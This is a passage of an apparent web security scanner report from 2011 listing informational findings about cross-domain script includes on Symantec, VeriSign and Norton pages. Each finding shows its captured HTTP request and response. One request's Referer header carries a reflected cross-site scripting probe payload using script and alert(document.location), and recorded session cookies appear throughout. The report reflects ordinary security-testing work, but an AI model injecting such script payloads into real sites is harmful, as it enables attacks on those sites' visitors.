Information
Confidence:
Certain
Host:
https://symantec-corporation.com
Path:
/servlet/campaignrespondent
Issue detail
The response dynamically includes the following scripts from other domains:https://www-secure.symantec.com/lib/jsp/headerutilsjs.jsp?lg=en&ct=us&sg=business&domain=&secure= https://www-secure.symantec.com/script/20080114/swfobject.js https://www-secure.symantec.com/script/omniture/om_code.js https://www-secure.symantec.com/script/omniture/s_code.js https://www-secure.symantec.com/scripts/icrossing/i2a.js https://www-secure.symantec.com/specprog/onlineopinionS3t/oo_engine.js
Request
GET /servlet/campaignrespondent?_ID_=symnam.117&ACTIVITYCODE=113004 HTTP/1.1 Host: symantec-corporation.com Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:34:30 GMT P3P: policyref="http://policy.responsys.net/w3c/response.xml", CP="NON DSP COR IVAi IVDi OTRi IND ONL" Pragma: no-cache Cache-Control: no-cache, private Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 36800 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Symantec Enterprise Sales Contact Center</title> <meta content="veritasnonconsumer" name="om.environment"...[SNIP]... <link rel="stylesheet" href="https://www-secure.symantec.com/css/20081218/business.css" /><script src="https://www-secure.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"> </script>...[SNIP]... </script><script src="https://www-secure.symantec.com/specprog/onlineopinionS3t/oo_engine.js" language="javascript" type="text/javascript"> </script><script src="https://www-secure.symantec.com/script/20080114/swfobject.js" language="javascript" type="text/javascript"> </script><script src="https://www-secure.symantec.com/lib/jsp/headerutilsjs.jsp?lg=en&ct=us&sg=business&domain=&secure=" language="javascript" type="text/javascript"> </script>...[SNIP]... <!-- i2a tracking code--><script type="text/javascript" src="https://www-secure.symantec.com/scripts/icrossing/i2a.js"> </script>...[SNIP]... </p> <script src="https://www-secure.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"> </script>...[SNIP]...
15.20. https://trust-center.verisign.ch/process/retail/console_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.ch
Path:
/process/retail/console_login
Issue detail
The response dynamically includes the following scripts from other domains:https://ssl.google-analytics.com/urchin.js https://www.verisign.com/js/mbox.js
Request
GET /process/retail/console_login HTTP/1.1 Host: trust-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:46 GMT Server: Apache Set-Cookie: TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11715 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... </script><script type="text/javascript" src="https://www.verisign.com/js/mbox.js" language="JavaScript"> </script>...[SNIP]... </script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"> </script>...[SNIP]...
15.21. https://trust-center.verisign.com/process/retail/console_login
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/console_login
Issue detail
The response dynamically includes the following script from another domain:https://ssl.google-analytics.com/urchin.js
Request
GET /process/retail/console_login HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:48 GMT Server: Apache Set-Cookie: TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 12062 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... </script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"> </script>...[SNIP]...
15.22. https://trust-center.verisign.com/process/retail/help_and_support
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/help_and_support
Issue detail
The response dynamically includes the following script from another domain:https://ssl.google-analytics.com/urchin.js
Request
GET /process/retail/help_and_support HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:53 GMT Server: Apache Set-Cookie: TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 138732 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]... </script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"> </script>...[SNIP]...
15.23. https://trust-center.verisign.com/process/retail/trust_product_selector
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/trust_product_selector
Issue detail
The response dynamically includes the following script from another domain:https://ssl.google-analytics.com/urchin.js
Request
GET /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTHID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: Apache Set-Cookie: TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 Content-Length: 41019 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> ...[SNIP]... </script> <script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"> </script>...[SNIP]...
15.24. http://us.norton.com/360
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/360
Issue detail
The response dynamically includes the following script from another domain:http://www.googleadservices.com/pagead/conversion.js
Request
GET /360 HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=679 Date: Fri, 09 Sep 2011 21:47:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107429 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Firewall - Anti Virus - Phishing Protection | Norton 360</title> <meta http-...[SNIP]... </script> <script src="http://www.googleadservices.com/pagead/conversion.js" type="text/javascript"> </script>...[SNIP]...
15.25. http://us.norton.com/downloads/index.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/downloads/index.jsp
Issue detail
The response dynamically includes the following script from another domain:http://www.googleadservices.com/pagead/conversion.js
Request
GET /downloads/index.jsp HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=3256 Date: Fri, 09 Sep 2011 21:47:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 53856 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Download Norton Internet Security, Antivirus or Norton 360</title> <meta http-equiv="Content-Type" content="text/ht...[SNIP]... </script> <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]...
15.26. http://us.norton.com/familyresources/index.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/familyresources/index.jsp
Issue detail
The response dynamically includes the following script from another domain:http://www.symantec.com/script/20070727/windowShade.js
Request
GET /familyresources/index.jsp HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=64 Date: Fri, 09 Sep 2011 21:47:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 67586 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Family Resource Center: Internet Safety for Children, Teens &amp; Adults...[SNIP]... </div><script src="http://www.symantec.com/script/20070727/windowShade.js" language="javascript" type="text/javascript"> </script>...[SNIP]...
15.27. http://us.norton.com/nortonlive/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/nortonlive/
Issue detail
The response dynamically includes the following script from another domain:http://marchex.voicestar.com/euinc/number-changer.js
Request
GET /nortonlive/ HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=utf-8 Cache-Control: public, max-age=3479 Date: Fri, 09 Sep 2011 21:47:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39789 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Computer Support & Computer Tech Support | NortonLive</title> <meta http...[SNIP]... </script> <script type="text/javascript" src="http://marchex.voicestar.com/euinc/number-changer.js"> </script>...[SNIP]...
15.28. http://us.norton.com/nortonlive/spyware-virus-removal.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/nortonlive/spyware-virus-removal.jsp
Issue detail
The response dynamically includes the following script from another domain:http://marchex.voicestar.com/euinc/number-changer.js
Request
GET /nortonlive/spyware-virus-removal.jsp?inid=us_hho_support_topnav1_viruses&risks HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=utf-8 Cache-Control: public, max-age=3123 Date: Fri, 09 Sep 2011 21:47:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36294 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Virus Removal & Malware Removal Service | NortonLive</title> <meta http-...[SNIP]... </script> <script type="text/javascript" src="http://marchex.voicestar.com/euinc/number-changer.js"> </script>...[SNIP]...
15.29. http://us.norton.com/products/index.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/products/index.jsp
Issue detail
The response dynamically includes the following script from another domain:http://www.googleadservices.com/pagead/conversion.js
Request
GET /products/index.jsp HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=1696 Date: Fri, 09 Sep 2011 21:47:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 40963 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Protect your computer and remove adware and spyware with Norton 360</title> <meta http-equiv="Content-Type" content...[SNIP]... </script><script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]...
15.30. http://us.norton.com/security_response/index.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/security_response/index.jsp
Issue detail
The response dynamically includes the following script from another domain:http://admin.brightcove.com/js/BrightcoveExperiences.js
Request
GET /security_response/index.jsp HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=1815 Date: Fri, 09 Sep 2011 21:47:06 GMT Connection: close Connection: Transfer-Encoding Content-Length: 67812 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Viruses and Risks - Exploits - Virus Protection | Security Response</title>...[SNIP]... </div> <script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript"> </script>...[SNIP]...
15.31. http://www.symantec.com/connect/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/connect/
Issue detail
The response dynamically includes the following script from another domain:http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
Request
GET /connect/ HTTP/1.1 Host: www.symantec.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://searchg.symantec.com/search?as_sitesearch=www.symantec.com/connect/blogs&q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0&ie=UTF-8&ip=50.23.123.106&access=p&sort=date:D:L:d1&entqr=0&entsp=a&oe=UTF-8&ud=1 Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.17 Last-Modified: Fri, 09 Sep 2011 21:03:21 +0000 Vary: Cookie ETag: "1315602201" Content-Type: text/html; charset=utf-8 X-Varnish: 1369354087 1369326710 X-Varnish-Cache: HIT X-Varnish-Hits: 287 Vary: Accept-Encoding Content-Length: 80043 Cache-Control: public, max-age=1794 Date: Fri, 09 Sep 2011 21:34:13 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... <![endif]--> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"> </script>...[SNIP]...
15.32. http://www.verisign.ch/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/
Issue detail
The response dynamically includes the following scripts from other domains:http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js http://cdn.verisign.com/authweb/global/assets/home/js/home.js?071211 http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911 https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
Request
GET /?tid=header-logo HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621600|session#1315621535113-743172#1315623400; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.2.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 31344 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"> </script>...[SNIP]... <div id="header_seal"> <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"> </script>...[SNIP]... </div> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/home/js/home.js?071211"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js"> </script>...[SNIP]...
15.33. http://www.verisign.ch/contact-information/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/contact-information/index.html
Issue detail
The response dynamically includes the following scripts from other domains:http://cdn.verisign.com/assets/shared/js/curvycorners.js http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911 https://s7.addthis.com/js/250/addthis_widget.js?username=verisign https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
Request
GET /contact-information/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 39107 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <link rel="stylesheet" href="/assets/corp/css/corp_generic_st...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"> </script>...[SNIP]... <div id="header_seal"> <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"> </script>...[SNIP]... </script> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"> </script>...[SNIP]... </div> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js"> </script>...[SNIP]... <![endif]--><script type="text/javascript" src="http://cdn.verisign.com/assets/shared/js/curvycorners.js"> </script>...[SNIP]...
15.34. http://www.verisign.ch/corporate/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/corporate/index.html
Issue detail
The response dynamically includes the following scripts from other domains:http://cdn.verisign.com/assets/shared/js/curvycorners.js http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911 http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/seal.js http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js http://player.ooyala.com/player.js?callback=receiveOoyalaEvent&playerId=ooyalaPlayer_44h86_g6tvkk69&width=488&height=335&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&wmode=transparent http://www.verisign.com/hp07/j/swfobj.js https://s7.addthis.com/js/250/addthis_widget.js?username=verisign https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
Request
GET /corporate/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621596|session#1315621535113-743172#1315623396; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.1.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 36193 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js" language="JavaScript"> </script><script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/seal.js" language="JavaScript"> </script><script type="text/JavaScript" src="//www.verisign.com/hp07/j/swfobj.js"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"> </script>...[SNIP]... <div id="header_seal"> <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"> </script>...[SNIP]... </script> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]... <div id="playerTVAD"> <script src="http://player.ooyala.com/player.js?callback=receiveOoyalaEvent&playerId=ooyalaPlayer_44h86_g6tvkk69&width=488&height=335&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&wmode=transparent"> </script>...[SNIP]... </div> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js"> </script>...[SNIP]... <![endif]--><script type="text/javascript" src="http://cdn.verisign.com/assets/shared/js/curvycorners.js"> </script>...[SNIP]...
15.35. http://www.verisign.ch/trust-seal/index.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.verisign.ch
Path:
/trust-seal/index.html
Issue detail
